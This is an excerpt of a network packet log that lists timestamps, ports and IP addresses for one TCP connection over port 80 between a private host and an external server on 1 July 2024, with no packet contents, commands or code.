Jul 1, 2024 13:02:13.938648939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938658953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938668013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938673019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938688993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938702106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938704014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938714027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938719034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938733101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938743114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938770056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939605951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939620972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939632893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939647913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939649105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939661980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939675093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939676046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939687014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939690113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939698935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939703941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939717054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939718962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939732075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939734936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939748049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939749956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939764977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939766884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.939780951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.939806938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940566063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940586090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940601110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940612078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940614939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940629959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940635920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940645933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940653086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940660000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940675020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940682888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940690041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940700054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940705061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.940727949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.940764904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941555023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941590071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941600084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941606045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941620111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941629887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941634893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941648006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941649914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941664934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941664934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941680908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941693068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941695929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941711903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.941720009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.941745043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942519903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942534924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942550898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942564964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942565918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942581892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942588091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942596912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942619085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942624092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942635059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942641973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942651033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942666054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.942667007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942692995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.942715883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943514109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943530083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943545103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943559885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943562984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943573952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943588972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943592072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943603992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943612099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943619967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943635941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943639994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943651915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.943666935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.943681002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944386005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944401979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944416046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944431067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944433928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944444895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944456100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944461107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944477081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944499016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944502115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944503069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944513083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944529057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.944530010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944545984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944555998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.944569111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945288897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945303917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945317984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945327997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945333004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945343971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945347071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945359945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945360899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945375919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945384979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945391893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945405960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945417881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945421934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.945432901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.945463896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946186066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946202040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946216106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946223974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946230888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946240902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946244955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946259022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946260929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946274996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946279049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946290016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946304083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946304083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946320057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946331978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946333885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.946371078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.946386099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947149992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947165012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947180033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947195053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947200060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947210073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947222948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947225094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947238922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947251081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947254896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947267056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947268009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947293043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947316885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947933912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947948933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947971106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.947972059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947987080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.947988987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948002100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948009968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948016882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948029041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948031902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948043108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948048115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948057890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948061943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948075056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948077917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948091984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948092937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948107958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948133945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948875904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948890924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948906898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948919058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948921919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948935986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948940992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948951006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948965073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948976994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948980093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.948992014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.948995113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949011087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949018002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949024916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949047089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949063063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949836016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949851036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949866056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949881077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949882984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949896097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949903011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949911118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949924946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949934006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949942112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949951887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949956894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949973106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.949980974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.949989080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950011969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950028896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950772047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950787067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950802088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950813055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950817108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950829029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950839996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950846910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950855970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950862885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950870037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950879097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950886011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950895071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950900078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950911999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950915098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950927019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950928926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.950947046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.950984001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951591015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951606989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951622009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951634884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951637983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951653004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951653957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951667070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951683044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951706886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951898098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951914072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951929092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.951934099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951951981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.951967955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952038050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952054024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952069044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952075958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952088118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952095985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952109098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952120066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952122927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952136040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952151060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952155113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952167034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952171087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952183008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952188015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952203035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952219963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.952980995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.952996969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953012943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953017950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953027964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953036070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953042984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953052998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953057051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953068972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953073025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953084946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953088045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953102112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953107119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953116894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953123093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953139067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953146935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953154087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953176022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953198910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953938961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953955889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953970909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953984976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.953988075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.953999996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954005957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954015017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954018116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954030037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954045057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954052925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954060078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954071045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954075098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954088926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954097033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954103947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954124928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954138994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954826117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954849005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954864025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954871893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954879045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954888105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954893112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954904079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954907894 CEST	80	49705	147.45.78.162	192.168.2.5
